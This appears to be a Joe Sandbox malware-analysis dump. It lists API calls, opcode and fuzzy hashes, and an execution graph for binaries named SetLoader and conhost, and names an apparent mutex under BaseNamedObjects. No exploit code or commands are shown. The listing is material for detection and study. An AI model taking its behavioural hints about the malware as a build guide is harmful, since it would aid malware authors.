                                              • Opcode ID: f31f64401be53209c98b0d745a5b9f859f985ef3f11b829386c105c571c0e005
                                              • Instruction ID: 0071820f1600531d4daec7c2e43903e4113f05e6ed4e6a151c7924c61916faea
                                              • Opcode Fuzzy Hash: f31f64401be53209c98b0d745a5b9f859f985ef3f11b829386c105c571c0e005
                                              • Instruction Fuzzy Hash: 7301286750431179D730AB79DC46DEBA7EEDE95370B58881EF449C7282EA30E890C2E5
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0063130A
                                              • ___raise_securityfailure.LIBCMT ref: 006313F2
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: 8]g
                                              • API String ID: 3761405300-167426776
                                              • Opcode ID: e1023b5b60a45e99fc4b13d729c72a90c0734fcb41b86c4fc05e84c71e0a0236
                                              • Instruction ID: e7098e4d9936bb7e747b323a596d229c5cca95d0e1ab86aec06a75f376a8b53d
                                              • Opcode Fuzzy Hash: e1023b5b60a45e99fc4b13d729c72a90c0734fcb41b86c4fc05e84c71e0a0236
                                              • Instruction Fuzzy Hash: C421C2B5510B01DBE728DF25E8996447BA7FB49314F5060AAE90ECB3B0E3F15AC08F49
                                              APIs
                                              • LoadBitmapW.USER32(00000065), ref: 0062D9ED
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0062DA12
                                                • Part of subcall function 0062C652: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0062DA3D,00000066), ref: 0062C665
                                                • Part of subcall function 0062C652: SizeofResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C67C
                                                • Part of subcall function 0062C652: LoadResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C693
                                                • Part of subcall function 0062C652: LockResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C6A2
                                                • Part of subcall function 0062C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6BD
                                                • Part of subcall function 0062C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6CE
                                                • Part of subcall function 0062C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0062C737
                                                • Part of subcall function 0062C652: GlobalUnlock.KERNEL32(00000000), ref: 0062C756
                                                • Part of subcall function 0062C652: GlobalFree.KERNEL32(00000000), ref: 0062C75D
                                              Similarity
                                              • API ID: GlobalResource$BitmapLoadLock$AllocCreateFindFreeFromGdipObjectSizeofUnlock
                                              • String ID: ]
                                              • API String ID: 1245295032-3352871620
                                              • Opcode ID: dd548e5173600162a43cfaa4edeedd5573b0e05acc81ac3907f7bf78e0412a0c
                                              • Instruction ID: 3747f1a6747aa382a0fe740733bf5b82029675f7f074458f3c85b21268b93b42
                                              • Opcode Fuzzy Hash: dd548e5173600162a43cfaa4edeedd5573b0e05acc81ac3907f7bf78e0412a0c
                                              • Instruction Fuzzy Hash: C301D672504B21A7CB116764AC09EBF3A7B9F81762F140124B808B7391DF31CD558EB4
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00010000,00623240,?,00000000,?), ref: 00623129
                                              • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00623170
                                                • Part of subcall function 00617BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00617BD5
                                              Similarity
                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                              • String ID: CreateThread failed
                                              • API String ID: 2655393344-3849766595
                                              • Opcode ID: d226f8becb9f7509b24f2ace9687c01e3086ca4b853c1e2f9419555bab1dff1d
                                              • Instruction ID: b94901f892f3a896cd3195dcb3bf34a1d0a980a0c85adec62275a5329d229fd4
                                              • Opcode Fuzzy Hash: d226f8becb9f7509b24f2ace9687c01e3086ca4b853c1e2f9419555bab1dff1d
                                              • Instruction Fuzzy Hash: AF01F975348B266FD3247F50EC45FA677ABEB42712F10012DFA835A2C0CBA0A9858B74
                                              APIs
                                                • Part of subcall function 0063B9A5: GetLastError.KERNEL32(?,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063B9A9
                                                • Part of subcall function 0063B9A5: _free.LIBCMT ref: 0063B9DC
                                                • Part of subcall function 0063B9A5: SetLastError.KERNEL32(00000000,?), ref: 0063BA1D
                                                • Part of subcall function 0063B9A5: _abort.LIBCMT ref: 0063BA23
                                              • _abort.LIBCMT ref: 0063E1D0
                                              • _free.LIBCMT ref: 0063E204
                                              Similarity
                                              • API ID: ErrorLast_abort_free
                                              • String ID: p,e
                                              • API String ID: 289325740-2941865787
                                              • Opcode ID: 0c3558f243a5588456f82c3eabd8a243396a23116ebdbe88eab77a263712c015
                                              • Instruction ID: d5abae4afd57ccff3726040de6b3e2ff8c9e6c0fc63b2e9e39630ad7101ffc05
                                              • Opcode Fuzzy Hash: 0c3558f243a5588456f82c3eabd8a243396a23116ebdbe88eab77a263712c015
                                              • Instruction Fuzzy Hash: 7F016D71D016269BCB62EF58D80229EB377BF0AB21F15021AE964673C1CB726E018FD5
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00631410
                                              • ___raise_securityfailure.LIBCMT ref: 006314CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: 8]g
                                              • API String ID: 3761405300-167426776
                                              • Opcode ID: fadf0882e23ffd07b96a497c20139571a959b3b7b813a4724df4a4750ed30409
                                              • Instruction ID: fd4594be2f0f19916b8101778d2c82ac75a83464d6a6f04633460ca1ea4f1691
                                              • Opcode Fuzzy Hash: fadf0882e23ffd07b96a497c20139571a959b3b7b813a4724df4a4750ed30409
                                              • Instruction Fuzzy Hash: 5111A2B5911B04DBD718DF25E8856443BB7BF09310B0060AAE90E8B3B1E3F09AC18F49
                                              APIs
                                                • Part of subcall function 0063E580: GetEnvironmentStringsW.KERNEL32 ref: 0063E589
                                                • Part of subcall function 0063E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0063E5AC
                                                • Part of subcall function 0063E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0063E5D2
                                                • Part of subcall function 0063E580: _free.LIBCMT ref: 0063E5E5
                                                • Part of subcall function 0063E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0063E5F4
                                              • _free.LIBCMT ref: 0063AB00
                                              • _free.LIBCMT ref: 0063AB07
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                              • String ID: pbg
                                              • API String ID: 400815659-799886492
                                              • Opcode ID: 7c235a7ca4a80da4eec8c5a0d4e4c2b77240a486812f72d124986c6ed8908b1c
                                              • Instruction ID: d14637a036cb45eabfcd9644925948fde4203110afd1bcad54ab65609eee11c8
                                              • Opcode Fuzzy Hash: 7c235a7ca4a80da4eec8c5a0d4e4c2b77240a486812f72d124986c6ed8908b1c
                                              • Instruction Fuzzy Hash: F8E0E533A0590055E7E57ABEAD12EAA05578B81330F10421DFA65861C3DE90880261EB
                                              APIs
                                              • LoadStringW.USER32(?,?,00611436,?), ref: 006205F8
                                              • LoadStringW.USER32(?,?,00611436), ref: 0062060F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: LoadString
                                              • String ID: pPe
                                              • API String ID: 2948472770-752056769
                                              • Opcode ID: 2851ebc5fe333e34616f2abc1cf76c72794abbec89522f2b473f13423f1fec0d
                                              • Instruction ID: 28af1cc6cff218c532752bca348580d2ecd1b78391855290af3b40865361acbd
                                              • Opcode Fuzzy Hash: 2851ebc5fe333e34616f2abc1cf76c72794abbec89522f2b473f13423f1fec0d
                                              • Instruction Fuzzy Hash: 8BF0F231100228BBDF115F51EC18CEBBF6BFF493A5B049025FD0986231D63288A0EBA0
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,006232E6,?), ref: 006230D0
                                              • GetLastError.KERNEL32(?), ref: 006230DC
                                                • Part of subcall function 00617BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00617BD5
                                              Strings
                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 006230E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                              • API String ID: 1091760877-2248577382
                                              • Opcode ID: e4e788f3c25b78549fea2948714c4f95027d6f4e749f431706496cc7deb0d7b6
                                              • Instruction ID: 1cd6bbbca0c117d0b8dd9e86a8536cc1a7b0288d92d20e319a09a820b3278d15
                                              • Opcode Fuzzy Hash: e4e788f3c25b78549fea2948714c4f95027d6f4e749f431706496cc7deb0d7b6
                                              • Instruction Fuzzy Hash: B2D05E3154C53037D7513B24AC0ADAE791B9B63732F644718F53A692F5CF204D9186EA
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,0061F951,?), ref: 006201FF
                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0061F951,?), ref: 0062020D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FindHandleModuleResource
                                              • String ID: RTL
                                              • API String ID: 3537982541-834975271
                                              • Opcode ID: 83221d05ba23ee5e5c1922e06ff503003f34c12a773a33762da9b7b75b3adcf1
                                              • Instruction ID: 38489695903d79409ae37507d614166b692bd99998b234574cb186b6f63559dd
                                              • Opcode Fuzzy Hash: 83221d05ba23ee5e5c1922e06ff503003f34c12a773a33762da9b7b75b3adcf1
                                              • Instruction Fuzzy Hash: D4C0127124075096E7305775BD4DB832E656B03F51F051449B541DA1D1D6E6C8458661

                                              Execution Graph

                                              Execution Coverage:2.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0.8%
                                              Total number of Nodes:861
                                              Total number of Limit Nodes:2
                                              execution_graph 2836 140001ac3 2837 140001a70 2836->2837 2838 140001b36 2837->2838 2842 14000199e 2837->2842 2843 140001b53 2837->2843 2840 140001ba0 4 API calls 2838->2840 2839 140001a0f 2840->2843 2841 1400019e9 VirtualProtect 2841->2842 2842->2839 2842->2841 1977 140001ae4 1979 140001a70 1977->1979 1978 140001b36 1985 140001ba0 1978->1985 1979->1978 1980 14000199e 1979->1980 1983 140001b53 1979->1983 1981 140001a0f 1980->1981 1984 1400019e9 VirtualProtect 1980->1984 1984->1980 1987 140001bc2 1985->1987 1986 140001c04 memcpy 1986->1983 1987->1986 1989 140001c45 VirtualQuery 1987->1989 1990 140001cf4 1987->1990 1989->1990 1994 140001c72 1989->1994 1991 140001d23 GetLastError 1990->1991 1992 140001d37 1991->1992 1993 140001ca4 VirtualProtect 1993->1986 1993->1991 1994->1986 1994->1993 2022 140001404 2095 140001394 2022->2095 2024 140001413 2025 140001394 2 API calls 2024->2025 2026 140001422 2025->2026 2027 140001394 2 API calls 2026->2027 2028 140001431 2027->2028 2029 140001394 2 API calls 2028->2029 2030 140001440 2029->2030 2031 140001394 2 API calls 2030->2031 2032 14000144f 2031->2032 2033 140001394 2 API calls 2032->2033 2034 14000145e 2033->2034 2035 140001394 2 API calls 2034->2035 2036 14000146d 2035->2036 2037 140001394 2 API calls 2036->2037 2038 14000147c 2037->2038 2039 140001394 2 API calls 2038->2039 2040 14000148b 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000149a 2041->2042 2043 140001394 2 API calls 2042->2043 2044 1400014a9 2043->2044 2045 140001394 2 API calls 2044->2045 2046 1400014b8 2045->2046 2047 140001394 2 API calls 2046->2047 2048 1400014c7 2047->2048 2049 140001394 2 API calls 2048->2049 2050 1400014d6 2049->2050 2051 1400014e5 2050->2051 2052 140001394 2 API calls 2050->2052 2053 140001394 2 API calls 2051->2053 2052->2051 2054 1400014ef 2053->2054 2055 1400014f4 2054->2055 2056 140001394 2 API calls 2054->2056 2057 140001394 2 API calls 2055->2057 2056->2055 2058 1400014fe 
2057->2058 2059 140001503 2058->2059 2060 140001394 2 API calls 2058->2060 2061 140001394 2 API calls 2059->2061 2060->2059 2062 14000150d 2061->2062 2063 140001394 2 API calls 2062->2063 2064 140001512 2063->2064 2065 140001394 2 API calls 2064->2065 2066 140001521 2065->2066 2067 140001394 2 API calls 2066->2067 2068 140001530 2067->2068 2069 140001394 2 API calls 2068->2069 2070 14000153f 2069->2070 2071 140001394 2 API calls 2070->2071 2072 14000154e 2071->2072 2073 140001394 2 API calls 2072->2073 2074 14000155d 2073->2074 2075 140001394 2 API calls 2074->2075 2076 14000156c 2075->2076 2077 140001394 2 API calls 2076->2077 2078 14000157b 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000158a 2079->2080 2081 140001394 2 API calls 2080->2081 2082 140001599 2081->2082 2083 140001394 2 API calls 2082->2083 2084 1400015a8 2083->2084 2085 140001394 2 API calls 2084->2085 2086 1400015b7 2085->2086 2087 140001394 2 API calls 2086->2087 2088 1400015c6 2087->2088 2089 140001394 2 API calls 2088->2089 2090 1400015d5 2089->2090 2091 140001394 2 API calls 2090->2091 2092 1400015e4 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015f3 2093->2094 2096 1400059a0 malloc 2095->2096 2097 1400013b8 2096->2097 2098 1400013c6 NtQueryKey 2097->2098 2098->2024 2099 140002104 2100 140002111 EnterCriticalSection 2099->2100 2101 140002218 2099->2101 2102 14000220b LeaveCriticalSection 2100->2102 2106 14000212e 2100->2106 2103 140002272 2101->2103 2105 140002241 DeleteCriticalSection 2101->2105 2107 140002230 free 2101->2107 2102->2101 2104 14000214d TlsGetValue GetLastError 2104->2106 2105->2103 2106->2102 2106->2104 2107->2105 2107->2107 1995 140001e65 1996 140001e67 signal 1995->1996 1997 140001e7c 1996->1997 1999 140001e99 1996->1999 1998 140001e82 signal 1997->1998 1997->1999 1998->1999 2844 140001f47 2845 140001e67 signal 2844->2845 2848 140001e99 2844->2848 2846 140001e7c 2845->2846 2845->2848 2847 140001e82 signal 2846->2847 2846->2848 2847->2848 2000 14000216f 
2001 140002185 2000->2001 2002 140002178 InitializeCriticalSection 2000->2002 2002->2001 2003 140001a70 2005 14000199e 2003->2005 2008 140001a7d 2003->2008 2004 140001a0f 2005->2004 2006 1400019e9 VirtualProtect 2005->2006 2006->2005 2007 140001b53 2008->2003 2008->2007 2009 140001b36 2008->2009 2010 140001ba0 4 API calls 2009->2010 2010->2007 2108 140001e10 2109 140001e2f 2108->2109 2110 140001e55 2109->2110 2111 140001ecc 2109->2111 2115 140001eb5 2109->2115 2110->2115 2116 140001f12 signal 2110->2116 2112 140001ed3 signal 2111->2112 2111->2115 2113 140001ee4 2112->2113 2112->2115 2114 140001eea signal 2113->2114 2113->2115 2114->2115 2116->2115 2849 140002050 2850 14000205e EnterCriticalSection 2849->2850 2851 1400020cf 2849->2851 2852 1400020c2 LeaveCriticalSection 2850->2852 2853 140002079 2850->2853 2852->2851 2853->2852 2854 1400020bd free 2853->2854 2854->2852 2855 140001fd0 2856 140001fe4 2855->2856 2857 140002033 2855->2857 2856->2857 2858 140001ffd EnterCriticalSection LeaveCriticalSection 2856->2858 2858->2857 2125 140001ab3 2126 140001a70 2125->2126 2126->2125 2127 140001b36 2126->2127 2128 14000199e 2126->2128 2131 140001b53 2126->2131 2130 140001ba0 4 API calls 2127->2130 2129 140001a0f 2128->2129 2132 1400019e9 VirtualProtect 2128->2132 2130->2131 2132->2128 1967 140001394 1971 1400059a0 1967->1971 1969 1400013b8 1970 1400013c6 NtQueryKey 1969->1970 1972 1400059be 1971->1972 1975 1400059eb 1971->1975 1972->1969 1973 140005a93 1974 140005aaf malloc 1973->1974 1976 140005ad0 1974->1976 1975->1972 1975->1973 1976->1972 2117 14000219e 2118 140002272 2117->2118 2119 1400021ab EnterCriticalSection 2117->2119 2120 140002265 LeaveCriticalSection 2119->2120 2122 1400021c8 2119->2122 2120->2118 2121 1400021e9 TlsGetValue GetLastError 2121->2122 2122->2120 2122->2121 2011 140001000 2012 14000108b __set_app_type 2011->2012 2013 140001040 2011->2013 2015 1400010b6 2012->2015 2013->2012 2014 1400010e5 2015->2014 2017 140001e00 2015->2017 2018 140005f30 
__setusermatherr 2017->2018 2019 140001800 2020 140001812 2019->2020 2021 140001835 fprintf 2020->2021 2123 140002320 strlen 2124 140002337 2123->2124 2133 140001140 2136 140001160 2133->2136 2135 140001156 2137 1400011b9 2136->2137 2138 14000118b 2136->2138 2139 1400011d3 2137->2139 2140 1400011c7 _amsg_exit 2137->2140 2138->2137 2141 1400011a0 Sleep 2138->2141 2142 140001201 _initterm 2139->2142 2143 14000121a 2139->2143 2140->2139 2141->2137 2141->2138 2142->2143 2159 140001880 2143->2159 2146 14000126a 2147 14000126f malloc 2146->2147 2148 14000128b 2147->2148 2150 1400012d0 2147->2150 2149 1400012a0 strlen malloc memcpy 2148->2149 2149->2149 2149->2150 2170 140003160 2150->2170 2152 140001315 2153 140001344 2152->2153 2154 140001324 2152->2154 2157 140001160 68 API calls 2153->2157 2155 140001338 2154->2155 2156 14000132d _cexit 2154->2156 2155->2135 2156->2155 2158 140001366 2157->2158 2158->2135 2160 140001247 SetUnhandledExceptionFilter 2159->2160 2161 1400018a2 2159->2161 2160->2146 2161->2160 2163 14000194d 2161->2163 2166 140001a20 2161->2166 2162 14000199e 2162->2160 2165 1400019e9 VirtualProtect 2162->2165 2163->2162 2164 140001ba0 4 API calls 2163->2164 2164->2163 2165->2162 2166->2162 2167 140001b53 2166->2167 2168 140001b36 2166->2168 2169 140001ba0 4 API calls 2168->2169 2169->2167 2173 140003176 2170->2173 2171 14000325d wcslen 2256 14000153f 2171->2256 2173->2171 2175 14000345e 2175->2152 2178 140003358 2181 14000337e memset 2178->2181 2183 1400033b0 2181->2183 2184 140003400 wcslen 2183->2184 2185 140003416 2184->2185 2189 14000345c 2184->2189 2186 140003430 _wcsnicmp 2185->2186 2187 140003446 wcslen 2186->2187 2186->2189 2187->2186 2187->2189 2188 140003521 wcscpy wcscat memset 2191 140003560 2188->2191 2189->2188 2190 1400035a3 wcscpy wcscat memset 2192 1400035e6 2190->2192 2191->2190 2193 1400036ee wcscpy wcscat memset 2192->2193 2194 140003730 2193->2194 2195 140003a78 wcslen 2194->2195 2196 140003a86 2195->2196 2200 140003abb 2195->2200 
2197 140003a90 _wcsnicmp 2196->2197 2198 140003aa6 wcslen 2197->2198 2197->2200 2198->2197 2198->2200 2199 140003ba1 wcscpy wcscat memset 2202 140003be3 2199->2202 2200->2199 2201 140003c26 wcscpy wcscat memset 2204 140003c6c 2201->2204 2202->2201 2203 140003c9c wcscpy wcscat memset 2206 140003cf0 2203->2206 2204->2203 2205 140003d35 wcscpy wcscat wcslen 2396 14000146d 2205->2396 2206->2205 2211 140003fa2 memset 2214 140003fc6 wcscpy wcscat wcslen 2211->2214 2215 140005610 2211->2215 2212 140003f85 2217 14000145e 2 API calls 2212->2217 2213 140003e4c 2482 1400014a9 2213->2482 2247 1400040f0 2214->2247 2228 140003ee3 2217->2228 2220 140003f74 2222 14000145e 2 API calls 2220->2222 2222->2228 2225 140003ed7 2226 14000145e 2 API calls 2225->2226 2226->2228 2227 1400041e5 wcslen 2229 14000153f 2 API calls 2227->2229 2228->2211 2229->2247 2230 14000528a memcpy 2230->2247 2231 14000534e memcpy 2231->2247 2232 14000461d wcslen 2234 14000153f 2 API calls 2232->2234 2233 1400043a7 wcslen 2643 14000157b 2233->2643 2234->2247 2236 14000145e NtQueryKey malloc 2236->2247 2237 140004435 memset 2237->2247 2238 140004f21 wcscpy wcscat wcslen 2240 140001422 2 API calls 2238->2240 2239 14000449f wcslen 2660 1400015a8 2239->2660 2240->2247 2243 14000450b _wcsnicmp 2243->2247 2245 140005063 2245->2152 2246 14000510e wcslen 2249 1400015a8 2 API calls 2246->2249 2247->2227 2247->2230 2247->2231 2247->2232 2247->2233 2247->2236 2247->2237 2247->2238 2247->2239 2247->2243 2247->2245 2247->2246 2248 140005393 memcpy 2247->2248 2250 140004cb9 memset 2247->2250 2251 140004ec0 memset 2247->2251 2252 1400026e0 11 API calls 2247->2252 2253 140004d1b memset 2247->2253 2254 140004d75 wcscpy wcscat wcslen 2247->2254 2598 1400014d6 2247->2598 2671 140001521 2247->2671 2769 140001431 2247->2769 2248->2247 2249->2247 2250->2247 2250->2251 2251->2247 2252->2247 2253->2247 2700 140001422 2254->2700 2257 140001394 2 API calls 2256->2257 2258 14000154e 2257->2258 2259 140001394 2 API calls 2258->2259 2260 
14000155d 2259->2260 2261 140001394 2 API calls 2260->2261 2262 14000156c 2261->2262 2263 140001394 2 API calls 2262->2263 2264 14000157b 2263->2264 2265 140001394 2 API calls 2264->2265 2266 14000158a 2265->2266 2267 140001394 2 API calls 2266->2267 2268 140001599 2267->2268 2269 140001394 2 API calls 2268->2269 2270 1400015a8 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015b7 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015c6 2273->2274 2275 140001394 2 API calls 2274->2275 2276 1400015d5 2275->2276 2277 140001394 2 API calls 2276->2277 2278 1400015e4 2277->2278 2279 140001394 2 API calls 2278->2279 2280 1400015f3 2279->2280 2280->2175 2281 140001503 2280->2281 2282 140001394 2 API calls 2281->2282 2283 14000150d 2282->2283 2284 140001394 2 API calls 2283->2284 2285 140001512 2284->2285 2286 140001394 2 API calls 2285->2286 2287 140001521 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001530 2288->2289 2290 140001394 2 API calls 2289->2290 2291 14000153f 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000154e 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000155d 2294->2295 2296 140001394 2 API calls 2295->2296 2297 14000156c 2296->2297 2298 140001394 2 API calls 2297->2298 2299 14000157b 2298->2299 2300 140001394 2 API calls 2299->2300 2301 14000158a 2300->2301 2302 140001394 2 API calls 2301->2302 2303 140001599 2302->2303 2304 140001394 2 API calls 2303->2304 2305 1400015a8 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015b7 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015c6 2308->2309 2310 140001394 2 API calls 2309->2310 2311 1400015d5 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015e4 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015f3 2314->2315 2315->2178 2316 14000156c 2315->2316 2317 140001394 2 API calls 2316->2317 2318 14000157b 2317->2318 2319 140001394 2 API calls 2318->2319 2320 14000158a 2319->2320 2321 140001394 2 API calls 2320->2321 2322 

                                              Callgraph


                                              Control-flow Graph

                                              APIs
                                              • NtQueryKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: Query
                                              • String ID:
                                              • API String ID: 3850148591-0
                                              • Opcode ID: 3301f31b9b9372cf5e9fb5ac19819fd970931c75b2ec92cec9ebb1f8227d5c90
                                              • Instruction ID: f63f3fa406a65e9cef5182409c799f841b718ba35abfe43b4d96b66f91fed5a6
                                              • Opcode Fuzzy Hash: 3301f31b9b9372cf5e9fb5ac19819fd970931c75b2ec92cec9ebb1f8227d5c90
                                              • Instruction Fuzzy Hash: 53F09DB2608B4086EAA2DB52F85579A77A0F38D7D4F009919BBC843735DB38C1948F84

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                              • String ID: 0$X$\BaseNamedObjects\ulpojverlpgmoqpnoymvmffc$`
                                              • API String ID: 780471329-87308227
                                              • Opcode ID: 4e170992e9a830f5e772ae352952b17f9812ae85f3991c60a6a0385c4d56b00b
